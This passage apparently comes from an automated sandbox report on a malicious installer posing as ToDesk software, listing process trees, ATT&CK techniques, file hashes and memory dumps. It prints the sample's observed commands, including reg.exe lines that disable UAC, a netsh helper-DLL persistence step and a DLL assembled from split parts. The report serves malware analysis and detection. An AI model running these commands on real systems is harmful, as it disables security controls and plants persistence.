  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\SSD-w.msi"
    3⤵
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2668
- - C:\ToDesk (2).exe
    "C:\ToDesk (2).exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2036

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AD8166D956638EA1CEB27D47362417F4
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3000
- C:\Windows\Installer\MSI5B9D.tmp
  "C:\Windows\Installer\MSI5B9D.tmp"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /all
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:2520
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\E830I.xml
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - Modifies data under HKEY_USERS
    PID:1940
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ZCDVv.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
      4⤵
      UAC bypass
      PID:2032
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
      4⤵
      UAC bypass
      PID:2848
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
      4⤵
      UAC bypass
      PID:2628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\g68X1\f7pme~w\p+C:\Users\Public\Pictures\g68X1\f7pme~w\w C:\Users\Public\Pictures\g68X1\f7pme~w\libcurl.dll
    3⤵
    PID:1816

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D4" "00000000000003CC"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Windows\system32\mmc.exe
C:\Windows\system32\mmc.exe -Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:996
- C:\Users\Public\Pictures\g68X1\f7pme~w\MFTVMornitor.exe
  "C:\Users\Public\Pictures\g68X1\f7pme~w\MFTVMornitor.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f775796.rbs

Filesize
7KB

MD5
13b2b8445a20c7303bcc18d0b957e31e

SHA1
003d563a5b9d03b7b549c08d8731f59dfdf89fe6

SHA256
05a6a4e72d7a208acef4b4dd543021a1e272aebf7019535761ac4b50ed011b29

SHA512
4e1d8659b20659e683d99a9f924e8e2ac25d0e9df964b61e9be3e2da29274f548b457bf65e76c575e56065495f1398cff2d03c84587d70af2383b839c02ef682

Download Submit
C:\SSD-w.msi

Filesize
22.1MB

MD5
f5c4f7b018ee5a0f73619921fe4f45b0

SHA1
6094f951df9bf2596a91b678607c9605d9120c52

SHA256
e5764ad444c562eb4e3273913e108fc2c0360dd9bd80d3f88cf80a25e39c514a

SHA512
dede38255a0f4a7b926f3d9e1185ff364ffe0ee500c89ce5be35366e106f5d0096a4d04662de4aa9aa9f92845d32cabe26b42c9f05e4b3f72726e8ee5e0005b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
318KB

MD5
b5fc476c1bf08d5161346cc7dd4cb0ba

SHA1
280fac9cf711d93c95f6b80ac97d89cf5853c096

SHA256
12cb9b8f59c00ef40ea8f28bfc59a29f12dc28332bf44b1a5d8d6a8823365650

SHA512
17fa97f399287b941e958d2d42fe6adb62700b01d9dbe0c824604e8e06d903b330f9d7d8ffb109bfb7f6742f46e7e9cedad6981f0d94d629b8402d0a0174f697

Download Submit
C:\Users\Admin\AppData\Local\Temp\nse361F.tmp\nsNiuniuSkin.dll

Filesize
287KB

MD5
bb0cdff5ac2d64723007a0b4f7962a02

SHA1
410889522ee8ea7308b054f71bc4cab078295e06

SHA256
33e460a080a621cda7896e96b6f1beee802b485cf99e18b27463cd362c484b08

SHA512
b4dc2614f01f5f01d5dec9e6a41e072d01e924d8a94ac0dc1050399fd1dc3cc8d53d7ccf162d750d166fca200771b0850191b30c7caada8edea9ba6d686e2402

Download Submit
C:\Users\Admin\AppData\Local\Temp\nse361F.tmp\skin.zip

Filesize
733KB

MD5
121c40b2f8f3407211a14efec60088d3

SHA1
36bb7a0d4132f10cb165eb2b388489d7b9b3057c

SHA256
6c979c5efd4bca0ea050f24c2a063ce88d3fc02dfa4bc11f3bdb169da6e0875b

SHA512
23efc5b5c0ccc25ec568557f9e7a9a8237fbc86a9ccec7214b7e68482171c6a8077a8a1ffc123ce0078ec2771b00b0494a713289a2215919625e1911a5608266

Download Submit
C:\Users\Admin\AppData\Roaming\ZCDVv.bat

Filesize
392B

MD5
30d6eb22d6aeec10347239b17b023bf4

SHA1
e2a6f86d66c699f6e0ff1ac4e140af4a2a4637d1

SHA256
659df6b190a0b92fc34e3a4457b4a8d11a26a4caf55de64dfe79eb1276181f08

SHA512
500872c3f2f3f801ec51717690873194675cb7f32cc4a862c09d90c18638d364d49b0e04c32323f52734e5c806e3503a63ac755c7019d762786a72840123df76

Download Submit
C:\Users\Public\Pictures\g68X1\f7pme~w\MFTVMornitor.exe

Filesize
1.3MB

MD5
27890a1731a9bdfb4a55f0eb024f42b9

SHA1
17a603fdd0c27a933f42936e1d31018e654456bf

SHA256
340df3de91e0623f5242c4a2b58bfb59d942a50f97f504569f906ea637623c7d

SHA512
d2713923373eaad64bcab017fc30b7994bb93dda52e5a3a68088bb4c1831d92f99775ba825680867f373a6ab1682b16e22e3d76f5767940631ae3b860f8abee2

Download Submit
C:\Users\Public\Pictures\g68X1\f7pme~w\NH.txt

Filesize
179KB

MD5
322b47be78308652e8739e7116f0ec1e

SHA1
6bfcfd212344149563f10d4709d6478e69e81c13

SHA256
56806c318c68b5be14c324a2b63ce849cccbb8e6ac4125cc30dc1101e40929bf

SHA512
a55aa8585f4c46e1cdc5f71f7068312c7358b3791495efad37856e07623a3ca61e8b0868d6b2dbd9688aee2e222ab3288505d4c68479f7ee3be58303f83f1c96

Download Submit
C:\Users\Public\Pictures\g68X1\f7pme~w\libcurl.dll

Filesize
1.9MB

MD5
2adb0e0580a7bb31b1b6f2d0c53b7638

SHA1
9e9570fc25685b475f3e9adc00f1f9a5a73994ec

SHA256
a3e5f177cea52bd87cef1ba36f567f92e222f9dadc825d58c648948d2f0b6d46

SHA512
888aab70a7817ac7cee9c0a242e76e0c2d65f37c39295e7980de9ea4e36473030ece17f8ac367aea28fdd5a33e003e7ffa3bc717971406406b8d5127e452dee2

Download Submit
C:\Users\Public\Pictures\g68X1\f7pme~w\p

Filesize
994KB

MD5
5b0a3eafb0c4a58927e86b285e3a193a

SHA1
7881600224d983028589cae055794ca4981b627e

SHA256
56d1c4fb0b35f6a2fc5dfc4942feb8cd45e8f5c85cc4348f9808afbfcb5802d8

SHA512
517305fcd4c312d0329f4a645a4220bd3ad4173ffc11f5514b2279edf069366c33d02c66941611e53ef61c9c52efec8720c1330039a9cc5cb23a8d0a8de32d3c

Download Submit
C:\Users\Public\Pictures\g68X1\f7pme~w\w

Filesize
994KB

MD5
973c6dad7dbc199df7634efd981ea1b9

SHA1
625391483bc1e1080778b85e329895615be7ebed

SHA256
6224a8489d81c1638b81d708a4468753045f7786df2e736d611fbfd2a0a3d68e

SHA512
9d6d862f02a27180c3def58df1c0de33fb0572fadacfa3210b5f543007ab182814788714d3f2b2127dcf27c0d7b8bbbe7501ae6c0a4d1cb86299abf53f793ddd

Download Submit
C:\Windows\Installer\MSI581F.tmp

Filesize
557KB

MD5
db7612f0fd6408d664185cfc81bef0cb

SHA1
19a6334ec00365b4f4e57d387ed885b32aa7c9aa

SHA256
e9e426b679b3efb233f03c696e997e2da3402f16a321e954b54454317fceb240

SHA512
25e129cb22aaabc68c42ecf10bb650ac4d0609b12c08703c780572bac7ecf4559fcc49cd595c56ea48cf55260a984cfa333c08307ffb7c62268b03fbecc724b9

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
1.3MB

MD5
8588009f37c0775b2ca08c70da61a12b

SHA1
b46b012936c50e74c92cdef6a3f2818a76235a37

SHA256
5ba9ee2908a357e83f6bb222928ad86ee6bd9f7ce233276935ff883aca6b9b38

SHA512
95e107f16687ce0a905a34611286ad3eb9c30f188db34f49582f9bb468f7b99d96877ea98ffd356508ca48b29f91bf8a67b134ab2e74d146f6cda961a044f184

Download Submit
\Users\Admin\AppData\Local\Temp\nse361F.tmp\System.dll

Filesize
12KB

MD5
8cf2ac271d7679b1d68eefc1ae0c5618

SHA1
7cc1caaa747ee16dc894a600a4256f64fa65a9b8

SHA256
6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba

SHA512
ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

Download Submit
\Users\Public\Pictures\g68X1\f7pme~w\WinOSDMornitor.dll

Filesize
146KB

MD5
333ac5b9d015628823718f3b46eb3a53

SHA1
85cf85e5cfee990160980e399ce0acbd54dbf305

SHA256
5e7d6d77bf5459d64fc19e4a699af9f44e2909a9250b0b140abead986db1107e

SHA512
0e9f5778f03f970722dd843f40c86b2799e982d355d19414d54d75377ad2435adaf6ff577585d8c0dd822839bf41aeee01072cdec580b891150ad9af11da6610

Download Submit
\Windows\Installer\MSI5B9D.tmp

Filesize
14.3MB

MD5
4232d722afdfd6093f238ce386b251f4

SHA1
8c57d7053fc82c5097c0060090295ae47bf32359

SHA256
33af017dd14feafcfa51c105bbac88b4048cd703ca1c6bc0346f6c7cf73d71fa

SHA512
d00ceffdc69822807543b623dda773dedce09cf8429bd3497333a3b6acdc602b86d4d39257f93517a41cb6f4792c8a69b0ea549621854d2fc342e157b00049d4

Download Submit
memory/1636-149-0x0000000000A40000-0x0000000000AA9000-memory.dmp

Filesize
420KB

Download
memory/1896-125-0x0000000180000000-0x000000018025A000-memory.dmp

Filesize
2.4MB

Download
memory/1896-127-0x0000000180000000-0x000000018025A000-memory.dmp

Filesize
2.4MB

Download
memory/1896-126-0x0000000180000000-0x000000018025A000-memory.dmp

Filesize
2.4MB

Download
memory/2036-128-0x0000000074500000-0x00000000745BA000-memory.dmp

Filesize
744KB

Download
memory/2036-64-0x0000000074500000-0x00000000745BA000-memory.dmp

Filesize
744KB

Download
memory/2144-15-0x0000000003370000-0x000000000373B000-memory.dmp

Filesize
3.8MB

Download
memory/2144-6-0x0000000003370000-0x000000000373B000-memory.dmp

Filesize
3.8MB

Download
memory/2800-18-0x0000000000400000-0x00000000007CB000-memory.dmp

Filesize
3.8MB

Download
memory/2800-53-0x0000000000400000-0x00000000007CB000-memory.dmp

Filesize
3.8MB

Download
memory/2800-36-0x00000000045C0000-0x00000000045D0000-memory.dmp

Filesize
64KB

Download